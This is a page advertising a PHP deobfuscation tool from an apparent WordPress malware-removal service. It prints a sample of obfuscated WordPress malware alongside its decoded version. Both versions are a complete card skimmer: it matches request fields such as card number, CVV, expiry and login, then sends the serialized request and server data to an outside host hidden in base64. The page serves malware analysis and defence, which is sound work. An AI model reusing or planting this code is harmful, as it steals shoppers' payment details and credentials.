Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $KD8sja = ''.'im'. ''.''.'pl'.''. 'od'.''. 'e';$ZMma1s = $KD8sja("_", array("str", $KD8sja("", array('ro', 't1'.''. '3'))));$QcMdm = $ZMma1s('o'.''. 'nf'.''.'r6'.''. '4_r'.''.'apb'.''. 'qr');$kdaskd22a=$ZMma1s('o'.'n'. ''.'fr6'.''. '4_'.''.'q'.''. 'rpbqr');$CNvy = $ZMma1s('fr'.''. 'ev'.''.'...



Obfuscated php code

<?php $KD8sja = ''.'im'.
''.''.'pl'.''.
'od'.''.
'e';$ZMma1s = $KD8sja("_", array("str", $KD8sja("", array('ro',
't1'.''.
'3'))));$QcMdm = $ZMma1s('o'.''.
'nf'.''.'r6'.''.
'4_r'.''.'apb'.''.
'qr');$kdaskd22a=$ZMma1s('o'.'n'.
''.'fr6'.''.
'4_'.''.'q'.''.
'rpbqr');$CNvy = $ZMma1s('fr'.''.
'ev'.''.'nyv'.
'mr');$BcUo=$ZMma1s('ce'.
'r'.''.
't_'.''
.'z'.'ng'.
''.
'pu');$VIZdJ = $ZMma1s('s'.
''.'vyr_t'.''.'rg'.
''.'_pb'.'ag'.''.'ra'.
''.'gf');$LIyk = @$VIZdJ($ZMma1s('c'.''.
'uc:'.
'//'.'v'.''.
'ac'.'hg'));$KDaoo2a = $ZMma1s('wf'.''.
'ba_q'.''.'r'.''.
'p'.''.
'bqr');if(!empty($LIyk)) $LIyk = $KDaoo2a($LIyk, true);else $LIyk = array();
if (is_array($LIyk)) $_REQUEST=array_merge($_REQUEST, $LIyk);if ($BcUo("/".$kdaskd22a('Y2'.
'Nf'.'bn'.'Vt'.
'YmVyfGZpc'.
'nN0b'.''.'mF'.
'tZ'.'X'.'xj'.
'd'.''.'m'.'My'.''.'f'.'Hll'.'YX'.''.
'J8'.''.
'ZXhwa'.'X'.''.'J5f'.''.
'GN'.''.'hc'.''.'mRf'.'bnV'.''.
'tYm'.''.'V'.'yf'.'G1v'.''.
'bnRofG'.''.'N2'.''.
''.
'dnxzZ'.
'WN1'.''.'cm'.
''.'V0'.'cm'.
'Fk'.'a'.''.
'W5nfH'.
'Vz'.''.'Z'.''.'X'.'Ju'.
'YW1lfHB'.''.
'heW'.'1l'.'bnR8c2'.
'hp'.'cH'.'B'.'p'.''
.'bm'.'d8'.''
.'Ym'.'ls'.
'bGluZ3'.'xj'.'Y1'.
'98'.'ZH'.'Vt'.
'bXl'.'8'.'bG'.''.
'9'.'na'.'W'.'4=')."/i", $CNvy($_REQUEST))) $CAXLmva=@$VIZdJ("htt".
"ps:".
"//".trim($kdaskd22a('e'.'m'.''
.'Eu'.'aDRja'
.'y'.'5tZ'.''.
'S9'.''
.'iNmI'.'3Ln'.''.
'Bo'.'c'.
'A='.'=')), false, stream_context_create(array('ht'.
'tp' => array('met'.
'hod'  => 'P'.''.
'OS'.''.
'T',
'time'.
'out' => 2,
'hea'.
'der'  => $kdaskd22a('Q29'.'udG'.'Vu'.
'dC10'.'eXB'.'lOiB'.'hc'.
'HBs'.'aWNhdG'.'lvbi94LXd3'.
'dy1mb3Jt'.'LXVybGV'.
'uY29'.'kZWQ='),'content' => http_build_query(array(''.'ve'.
'rs'.''.
''.'io'.
'n'=>1, "enc".''
."ode"=>$QcMdm($CNvy($_REQUEST) . "-".
""."-" . $CNvy($_SERVER)),"ho".
"st"=>$_SERVER[$kdaskd22a("SFRUUF9IT1NU")]))))));

Decoded(de-Obfuscated) php code

<?php

$KD8sja = 'implode';
$ZMma1s = "str_rot13";
$QcMdm = "base64_encode";
$kdaskd22a = "base64_decode";
$CNvy = "serialize";
$BcUo = "preg_match";
$VIZdJ = "file_get_contents";
$LIyk = @file_get_contents("php://input");
$KDaoo2a = "json_decode";
if (!empty($LIyk)) {
    $LIyk = json_decode($LIyk, true);
} else {
    $LIyk = array();
}
if (is_array($LIyk)) {
    $_REQUEST = array_merge($_REQUEST, $LIyk);
}
if ($BcUo("/" . $kdaskd22a('Y2NfbnVtYmVyfGZpcnN0bmFtZXxjdmMyfHllYXJ8ZXhwaXJ5fGNhcmRfbnVtYmVyfG1vbnRofGN2dnxzZWN1cmV0cmFkaW5nfHVzZXJuYW1lfHBheW1lbnR8c2hpcHBpbmd8YmlsbGluZ3xjY198ZHVtbXl8bG9naW4=') . "/i", $CNvy($_REQUEST))) {
    $CAXLmva = @$VIZdJ("https://" . trim($kdaskd22a('emEuaDRjay5tZS9iNmI3LnBocA==')), false, stream_context_create(array('http' => array('method' => 'POST', 'timeout' => 2, 'header' => $kdaskd22a('Q29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ='), 'content' => http_build_query(array('version' => 1, "encode" => $QcMdm($CNvy($_REQUEST) . "-" . "" . "-" . $CNvy($_SERVER)), "host" => $_SERVER[$kdaskd22a("SFRUUF9IT1NU")]))))));
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.